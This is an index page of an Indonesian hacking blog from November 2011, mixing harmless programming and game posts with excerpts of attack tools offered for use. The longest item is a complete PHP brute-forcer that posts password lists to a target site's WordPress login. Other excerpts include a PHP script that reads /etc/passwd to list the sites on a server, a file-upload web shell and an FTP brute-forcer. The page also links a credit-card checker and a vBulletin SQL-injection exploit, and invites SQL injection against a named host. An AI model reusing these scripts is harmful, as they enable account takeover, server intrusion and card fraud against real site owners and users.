langsung aja ni script nya
Uses crt;Type Pegawai = record
NIP : String[9];Nama : String[50];Golongan : Char;Jamkerja : Real;End;
VarData : Pegawai;Gapok : Real...
Minggu, 27 November 2011
//
Label:
Programming
//
0
komentar
//
tadi jalan jalan dapat nya kayak gini...
gak tau ini entah mengapa terjadi kesalahan
di http://www.000webhost.com/faq.php?ID=-57
kalo bisa di sqli ya di sqli kan aja :ngak...
Jumat, 25 November 2011
//
Label:
Web Hacking
//
1 komentar
//
------------------------------------------------------------------------------------------------------
ok langsung aja ...
demo : http://nama-saya-nanda-kurniawan.blogspot.com/
downlad : https://sites.google.com/site/soulsick22/home/devil-404-soulsick.xml?attredirects=0&d=1
mantap kagak ?
makasih kang udan deres
atas Templete nya ......
Jumat, 25 November 2011
//
Label:
Script / Source code
//
4
komentar
//

ok langsung aja download CC cheker dari x0wn3d ....
Screan shot
download : Here
Mirror : http://www.ziddu.com/download/17521336/x0wn3dCreditCardCheker.rar.ht...
Jumat, 25 November 2011
//
Label:
cracking
//
0
komentar
//
ok langsung aja
buka notepad
copas scrip ini save dgn extensi scan.php all files...
<?php
set_time_limit(0);
($x0b = ini_get('safe_mode') == 0) ? $x0b = 'off': die('<b>Error: Safe Mode is On</b>');
@$x0c = fopen('/etc/passwd','r');
if (!$x0c) { die('<b> Error : Can Not Read Config Of Server </b>'); }
// $x0d = array();
// $x0e = array();
// $x0f = array();
// $x10 = 0;
while(!feof($x0c)){
// baca baris...
// $x11 = fgets($x0c);
...
Jumat, 25 November 2011
//
Label:
Script / Source code
//
0
komentar
//
<?php echo '<b>x0wn3d<br><br>'.php_uname().'<br></b>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; } else...
Jumat, 25 November 2011
//
Label:
Script / Source code
//
0
komentar
//
=====================================================================
=========
_ _ _ _ _ _
/...
Jumat, 25 November 2011
//
Label:
Web Hacking
//
0
komentar
//
ok langsung aja..
ni game tentang strategi,pikiran,dan petualangan..
di game ini kita memakai 3 karakter...
shaun,sherly,timmy
untuk perintah nya di situ sudah diterangin...
sebelum memainkan nya....mozila ente harus terpasang adobe flash player dolo...
soalnya ni game memakai flash...
langsung aja ke TKP
...
Kamis, 24 November 2011
//
Label:
Game
//
0
komentar
//
ok langsung aja keintinnya ...
buka http://turnyournameintoaface.com
terlebih dahulu...
lalu...tinggal masukin nama lu...tekan into a face ..tunggu beberapa saat..
maka muka lu akan keluar ...
tergantung nama kamu :)
contoh...
Nanda Kurniawan
Jelek amat ya :'(
ok selamat mecoba ....
Rabu, 23 November 2011
//
Label:
tips n trick
//
0
komentar
//
====================================================================
#vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
====================================================================
# ...
Rabu, 23 November 2011
//
Label:
Exploit
//
0
komentar
//
Visual Basic versi 6.0 adalah versi terakhir VB sebelum berubah menjadi .Net. Banyak yang bertanya tentang perbedaan antara keduanya. Berikut sekilas perbedaan dan persamaan VB 6.0 dan VB .Net.
VB6 baru sebagian mendukung OOP. VB .Net telah mendukung penuh OOP.
Hasil kompilasi source code pada VB6 adalah file .exe biner (native code). VB .Net berupa file .exe intermediate language (MSIL byte code).
Hasil kompilasi pada VB6 dapat langsung dieksekusi. VB .Net membutuhkan run time environment...
Senin, 21 November 2011
//
Label:
Programming
//
0
komentar
//
cekidot
<?php
#By vc.emiter
#PRIV8 nist
if($_GET[act] == "ftp")
{
echo("<b>Online FTP BruteForce</b><br />");
if($_GET[name] && $_GET[domain])
{
if($handle = @opendir("/home/{$_GET[name]}/domains/{$_GET[domain]}/public_html/"))
{
while(FALSE !== ($dir = @readdir($handle)))
...
Senin, 21 November 2011
//
Label:
Web Hacking
//
0
komentar
//
oke langsung aja
ni script nya
<html>
<head>
<title>Wordpress Brute By Poticous</title>
<style>
body{
background:#000000;
font-family:Tahoma,Verdana,Arial;
color:#fff;
font-size:12px;
}
.footer{
text-align:right;
padding:0 16px;
font-size:10px;
letter-spacing:2px;
color:#999999;
}
.footer:hover{
text-align:right;
padding:0 16px;
font-size:10px;
letter-spacing:2px;
color:#999999;
text-decoration:underline;
}
.input{
width:200px;
}
textarea.input{
height:100px;
}
</style>
</head>
<body>
<?php
$brute = $_GET['brute'];
if($_POST){
$file = "devilzc0de.txt";
$pwd = $_POST['passwd'];
$handle = fopen($file, 'w');
fwrite($handle, "$pwd");
fclose($handle);
set_time_limit(0);
$username = $_POST['username_target'];
$dictionary ="devilzc0de.txt";
// Mencari Value Submit http://devilzc0de.org/forum/thread-10245.html
$homepage = file_get_contents($_POST["situs_target"].'/wp-login.php');
$string_awal = '<input type="submit" name="wp-submit" id="wp-submit" class="button-primary" value="';
$string_akhir = '" tabindex="100" />';
$homepage = explode($string_awal, $homepage);
$homepage = explode($string_akhir, $homepage[1]);
##########################################
function kontrol($utarget,$ptarget){
$useragent = "Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54";
$data = "log=$utarget&pwd=$ptarget&wp-submit=".$homepage[0]; ;
$ch = curl_init($_POST["situs_target"].'/wp-login.php');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("WordPress</title>",$source)){return true;} else {return false;}
}
if(!is_file($dictionary)){echo "Kamus Password Tidak Di Temukan";exit;}
$lines=file($dictionary);
echo "Attack Starting..<br>";
sleep(10);
echo "Attack Started, brute forcing..<br>";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "<font color=\"green\"><b>[+]</b> username : <b>$username</b> , password : <b>$line</b><br>";}
else{echo "<font color=\"red\"><b>[-]</b> username : $username , password : $line<br>";
}
}
}else{
?>
<form action="" method="post">
<p>
<label>Username<br>
<input type="text" name="username_target" class="input"></label>
</p>
<p>
<label>List Password<br>
<textarea name="passwd" class="input"></textarea></label>
</p>
<p>
<label>Situs Target<br>
<input type="text" name="situs_target"class="input"> Ex : http://localhost/wordpress/</label>
</p>
<input type="submit" value="Brute">
</form>
<?
}
?>
<p class="footer">© <?php echo date('Y'); ?> Poticous - Devilzc0de</p>
</body>
</html> ...
Senin, 21 November 2011
//
Label:
Web Hacking
//
0
komentar
//
kemaren saya salah download backtrack 5....
yang seharusnya mendownload iso...
ini saya malah mendownload untuk vmware . . .
karena tidak bisa...ya jadi saya akali...
dan akhirnya berhasil saya menginstal bactrack 5...
untuk vidio tutorial download disini
size : 2mban
download : HERE
untuk backtrack 5 nya bisa di download di http://www.backtrack-linux.org/downloads/...
Minggu, 20 November 2011
//
Label:
Linux
//
0
komentar
//
ok .... dengan source ini kita bisa memanggil file exe di dalam hardisk....
atau kurang jelas download aja vidio nya
size : 2mban
download : HE...
ok ...langsung aja download vidio tutorial nya
didalam rar ini sudah saya siapkan source code nya juga...mana tau ada yang kurang jelas =))
size : 2 mban
download : HE...
software perl : http://strawberryperl.com/
script :
#!/usr/bin/perl
#
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
use HTTP::Cookies;#use LWP::Protocol::socks;push(@LWP::Protocol::http::EXTRA_SOCK_OPTS, MaxLineLength => 16*1024);#use Getopt::Std;use Crypt::SSLeay;
$|=1;
my $locale;my $ct;my $lsd;my $post_form_id;my $composer_id;my $fb_dtsg;
my $kuote ;my $tokoh ;my $taunhi...
Minggu, 20 November 2011
//
Label:
Script / Source code
//
0
komentar
//
Laman
x0wn3d
nanda. Diberdayakan oleh Blogger.
About This Blog
My Blogs
Blog Archive
-
▼
2011
(27)
-
▼
November
(24)
- Data Kariawan ( Pascal )
- Bug di hosting 000webhost
- Templete Portal Blog
- x0wn3d Credit Card Cheker
- Script scan site 1 server
- Script upload
- Mini File Host v1.5 Remote File Upload Vulnerability
- game shaun the sheeps online
- ubah nama kamu menjadi muka
- vBulletin 4.0.x => 4.1.2 (search.php) SQL Injectio...
- Perbedaan VB 6 dan VB .Net
- FTP & Mysql Brutaforce ( PHP )
- wordpress brutaforce (PHP)
- cara menginstal backtrack 5 extensi vmdk pakai vmware
- cara memanggil file .exe pakai visual basic
- membuat form berpassword menggunakan visual basic
- menghitung luas lingkaran,persegi,etc pakai pascal
- bot update status fb pakai perl
- PHP Login script
- 7,000 Dorks
- Setting 404 Error Page di 000webhost
- Serial Key smadav 8.7
- Joomla! Security Scanner
- Script Mini host file
-
▼
November
(24)
Followers
